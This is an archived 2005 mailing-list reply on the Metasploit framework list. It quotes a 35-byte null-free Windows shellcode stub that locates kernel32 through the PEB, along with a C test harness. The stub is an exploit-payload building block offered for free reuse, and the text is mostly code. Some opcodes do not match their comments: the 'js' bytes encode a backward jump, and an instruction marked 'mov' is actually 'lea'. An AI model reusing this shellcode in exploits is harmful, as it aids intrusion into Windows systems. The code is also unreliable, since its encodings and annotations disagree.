Windows 9x/NT/2k/XP PEB method 35 bytes

[class101 at hat-squad.com (class 101)]

'Lut Jerome ;) , thx mec c bien utile tout ?a
-------------------------------------------------------------
class101
Hat-Squad.com
-------------------------------------------------------------
----- Original Message -----
From: "Jerome ATHIAS" <jerome.athias at free.fr>
To: <framework at metasploit.com>
Sent: Sunday, January 09, 2005 8:52 PM
Subject: [framework] Windows 9x/NT/2k/XP PEB method 35 bytes


> /*This is a 35 byte C implementation of the use of the PEB method to get
> *the kernel32 base address on Windows. This is generic code designed to
> *run on both Windows 9x and NT based systems. The code has been optimized
> *to not have any 00h bytes so that you wont have to use an XOR routine to
> *encode the shellcode. I used relative jumps and xor tricks to avoid the
> *00h bytes and make the code as small as I could get it. Feel free to use
> *this source in anything that you want.
> */
>
>
> /* 35 byte PEB method for Windows 9x/NT/2k/XP
> *  0x00 byte optimized, no XOR routine required.
> *
> *  www.4x10m.com
> *  oc.192
> *  irc.4x10m.net #4x10m
> */
>
> unsigned char shellcode[] =
> /*  35 byte PEB - 00h removal and size optimized  */
> /*      22 - 24 total clock cycles on a x486      */
> "\x31\xC0"                  /* xor eax, eax       */
> "\x31\xD2"                  /* xor edx, edx       */
> "\xB2\x30"                  /* mov dl, 30h        */
> "\x64\x8B\x02"              /* mov eax, [fs:edx]  */      /* PEB base
> address */
> "\x85\xC0"                  /* test eax, eax      */
> "\x78\xC0"                  /* js 0Ch             */
> "\x8B\x40\x0C"              /* mov eax, [eax+0Ch] */      /* NT kernel32
> routine */
> "\x8B\x70\x1C"              /* mov esi, [eax+1Ch] */
> "\xAD"                      /* lodsd              */
> "\x8B\x40\x08"              /* mov eax, [eax+08h] */
> "\xEB\x07"                  /* jmp short 09h      */
> "\x8B\x40\x34"              /* mov eax, [eax+34h] */      /* 9x kernel32
> routine */
> "\x8D\x40\x7C"              /* lea eax, [eax+7Ch] */
> "\x8D\x40\x3C"              /* mov eax, [eax+3Ch] */
> ;
>
> int main(int argc, char *argv[]) {
>       file://void (*sc)() = (void *)shellcode;
>       printf("len:%d\n", sizeof(shellcode));
>       file://sc();
>       return 0;
> }